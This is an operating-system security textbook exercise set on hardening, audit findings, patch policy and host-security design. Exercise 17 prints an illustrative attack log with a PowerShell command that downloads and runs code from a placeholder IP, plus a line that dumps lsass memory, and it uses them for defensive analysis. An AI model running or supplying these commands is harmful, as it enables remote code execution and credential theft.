Exercises: Operating System Security
These exercises move from recall to hands-on judgment — hardening systems, finding misconfigurations, analyzing baselines, and designing host-security standards. Difficulty is marked ⭐ (recall/application), ⭐⭐ (analysis), and ⭐⭐⭐ (synthesis/design/open-ended). A dagger (†) marks problems with a full worked solution in Appendix: Answers to Selected Exercises — attempt every problem before reading one.
Work in your own notebook, a lab VM you own, or a private repository. Where an exercise asks you to "harden," "score," or "design," the reasoning matters more than matching an exact answer key; a defensible justification is the goal. Authorization rule: apply any command in these exercises only to systems you own or are explicitly authorized to administer.
Part A — Core vocabulary and concepts ⭐
1.† Define each term in one sentence: hardening, attack surface reduction, baseline configuration, least functionality. Then write one sentence that uses all four correctly.
2. Explain the difference between patching and hardening. Give one concrete example of a system that is fully patched but poorly hardened, and one that is well hardened but unpatched. Which is "secure"?
3. Classify each as a Windows, Linux, or macOS control (some apply to more than one): (a) Group Policy; (b) SELinux; (c) LAPS; (d) Gatekeeper; (e) AppArmor; (f) FileVault; (g) seccomp; (h) Defender ASR rules; (i) System Integrity Protection; (j) AppLocker.
4. What is a CIS Benchmark, and what is the difference between its Level 1 and Level 2 profiles? Give one factor you would use to decide which level to apply to a given system.
5.† In one or two sentences each, explain what Secure Boot protects against and what a TPM adds. Why is a control that runs before the operating system valuable even on an otherwise hardened machine?
6. Distinguish antivirus from EDR in two sentences. Name one kind of attack that EDR catches and signature-based AV typically misses, and say why.
7. What is application allowlisting, and to which network-security concept from Chapter 7 is it directly analogous? State the shared underlying pattern in three words.
Part B — Harden this system ⭐⭐
8.† Harden this Windows server. A new domain-joined Windows Server has the following state. List, in priority order, the five hardening changes you would make, and for each name the attacker technique it removes or the telemetry it adds.
SMBv1: enabled Local Administrator: enabled (shared image password)
PowerShell: unrestricted, no logging Host firewall: allow all
Defender tamper protection: off Unused roles: Print Spooler running
9. Harden this Linux host. You run ss -tulpn on a web server and see it is listening on TCP 80,
443, 22, 25 (an MTA), and 111 (rpcbind). The web app needs 80/443; admins need 22. Write the specific
hardening actions for the services, and the sshd_config lines you would set to harden SSH. Justify each.
10. Harden macOS in the enterprise. A designer's unmanaged MacBook has FileVault off, Gatekeeper relaxed (they bypassed it once for a tool), no MDM, and no EDR. List the changes you would make and the single decision that enables most of them. Why is "it's a Mac, it's fine" not a security posture?
11.† A SELinux-protected host has an application that is being denied an access it legitimately needs.
A colleague suggests setenforce 0. Explain why that is the wrong fix, what the right fix is (name the
tools/log you would use), and what risk setenforce 0 introduces — especially if it becomes a habit.
12. Take any one operating system you use. Using ss/netstat (Linux/Windows) or equivalent, find
one listening service you do not need and write the exact command(s) to disable/remove it. (Lab/your-own
systems only.) Note the difference between disabling and removing, and which you chose and why.
Part C — Find the misconfiguration ⭐⭐
13.† Find the misconfig. Here is an excerpt of a hardening-audit report comparing a Linux server against its baseline. Identify the three most dangerous findings and rank them, with one sentence each on the attack they enable.
required: PermitRootLogin=no actual: PermitRootLogin=yes
required: PasswordAuthentication=no actual: PasswordAuthentication=yes
required: SELinux=enforcing actual: SELinux=permissive
required: auditd=running actual: auditd=running (OK)
required: /etc/shadow perms=0000 actual: /etc/shadow perms=0640
14. Find the misconfig. A Windows GPO intended to harden servers is linked to the Workstations OU by mistake, and the Servers OU has no hardening GPO linked at all. What is the security impact? Which two facts about how Group Policy works make this an easy mistake with a large blast radius?
15.† Audit-report reading. The harden.py tool from the chapter outputs the following against a host.
For each drifted setting, state (a) the attacker capability it restores and (b) whether it is primarily a
prevention gap or a detection gap.
3 setting(s) drifted from baseline:
smbv1_enabled required=False actual=True
powershell_logging required=True actual=False
application_allowlisting required=on actual=off
16. A server team reports "100% patch compliance — every critical patch was deployed within seven days." On investigation, 12% of the fleet has not actually installed last month's critical patch (machines were offline, deployments failed, three are excepted). Explain the gap between "deployed" and "installed," and write the two metrics you would report instead of the single misleading one.
Part D — Analyze the baseline / telemetry ⭐⭐
17.† Analyze this log. This Windows event excerpt is from a server with PowerShell script-block logging enabled. What does it suggest, and what does it tell you about why the hardening control "enable script-block logging" matters? (Times UTC; details illustrative.)
EventID=4104 ScriptBlock: "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
EventID=4688 NewProcess: powershell.exe ParentProcess: winword.exe CommandLine: -enc <base64...>
EventID=4104 ScriptBlock: "Get-Process lsass | Out-File C:\\Temp\\l.dmp"
(a) Describe the likely attack chain. (b) Which Defender ASR rule would have blocked step one (Word spawning PowerShell)? (c) Which controls from this chapter are doing the detecting here?
18. Compare two baselines for the same Windows Server role: one team adopts CIS Level 1, another adopts Level 2 but documents six deviations (relaxed settings) with business reasons. Which is "more secure"? Argue why a documented, deviation-tracked Level 2 might be better or worse than a clean Level 1.
19.† Given this fragment of a Meridian host-hardening standard, identify two things that are missing that the chapter says a complete standard must include, and one place where the standard is internally inconsistent.
Windows Server baseline: CIS Benchmark, Level 1.
Enforcement: configure each server at build time.
EDR: required on all servers. Allowlisting: required on all servers.
Local admin: shared image password, rotated annually.
20. EDR vs. AV decision. For each system, state whether AV alone, EDR, or both are appropriate and why: (a) a fixed-function ATM controller running a known, unchanging software set; (b) a developer workstation; (c) a domain controller; (d) an internet-facing web server.
Part E — Write the policy / standard ⭐⭐–⭐⭐⭐
21. Write the standard (excerpt). Draft the Linux server section of Meridian's host-hardening standard. Include: source benchmark + level, the MAC requirement, the SSH posture, the patch timeline tiers, the required endpoint agents, and how compliance is verified. Keep it to ~15 lines.
22.† Write the patch policy. Write a four-tier risk-based host patch-management policy (the timelines) for Meridian, justify each tier's timeline in a phrase, and add a one-sentence rule for systems that cannot be patched on demand.
23. Write the exception. A legacy core-banking interface runs only on an out-of-support OS and cannot be patched. Write a risk-acceptance/exception record: the risk, why it cannot be patched, three compensating controls, the owner, and a review/expiry date.
24. ⭐⭐⭐ Write the audit rule. Extend the chapter's audit_baseline concept: in pseudocode or
Python, describe how you would (a) score the severity of each drifted setting (not all drift is equal)
and (b) produce a single host "hardening score" the team could trend over time. What would you weight
most heavily and why?
Part F — Design it ⭐⭐⭐
25. Design the host-hardening program. Meridian has ~1,500 Windows endpoints, ~200 Windows servers, ~60 Linux servers (some in AWS), and ~40 Macs. Design a one-page host-hardening program: baselines and enforcement per platform, how you roll it out without breaking production, which controls go on servers first, and how you measure success. Reference at least three specific controls from the chapter.
26. Design for the unpatchable. Design the defensive wrapper for a fleet of fixed-function devices that the vendor patches only twice a year. You may not change the patch cadence. Use segmentation (Ch. 6–7), host controls from this chapter, and monitoring. State your assumed worst case and how your design contains it.
27. ⭐⭐⭐ Design the gold image. Specify the security configuration of a hardened Windows Server "gold image" Meridian will build all servers from. List ten settings/controls it must include, and explain how you prevent the gold-image-shares-one-flaw-everywhere problem from the chapter's opening (hint: at least one of your ten controls exists specifically to solve it).
Part G — CTF-style challenge ⭐⭐⭐
28.† The comfortable server. You are handed forensic notes on a compromised Windows file server: the attacker entered via a phished workstation three hops away, used the local Administrator credential to move laterally to this and 39 other servers, transferred tools over SMBv1, ran encoded PowerShell that the team cannot reconstruct, and disabled Defender before acting. For each of those five facts, name the single control from this chapter that would have prevented or recorded it, and then state which one control, if you could deploy only one across the fleet, would have most reduced the blast radius — and defend the choice.
Part H — Interleaved & forward-looking ⭐⭐
29. (Interleaved with Ch. 6–7.) A server cannot be patched for 30 days while a vendor certifies a fix. Combine a network control (Ch. 6–7) and two host controls (this chapter) into a layered interim defense, and explain how each layer assumes the previous one might fail (Theme 4).
30. (Interleaved with Ch. 3.) Map this chapter's "remove the surface AND log the behavior" pairing onto the preventive/detective control functions from Chapter 3. Give one host example of each function and explain why a hardening program needs both rather than choosing one.
31. (Interleaved with Ch. 1.) Using likelihood × impact (Ch. 1), score two host findings — (a) an internet-facing server with SMBv1 enabled, (b) an internal print server missing PowerShell logging — and explain how the scores would set your hardening priority. Justify each rating in a phrase.
32. ⭐⭐⭐ (Forward-looking.) This chapter said SELinux/AppArmor and seccomp are "least privilege applied to programs," and connected device posture to the TPM. Predict, in a short paragraph each, how (a) the confinement idea reappears for containers (Ch. 15) and (b) TPM-backed attestation reappears in zero-trust device-posture decisions (Ch. 32). Revisit your predictions after those chapters.
Solutions to daggered (†) problems are in the Answers appendix. The remaining problems are deliberately open — bring them to a lab, a study group, or your instructor. Never run a hardening command against a system you do not own or administer.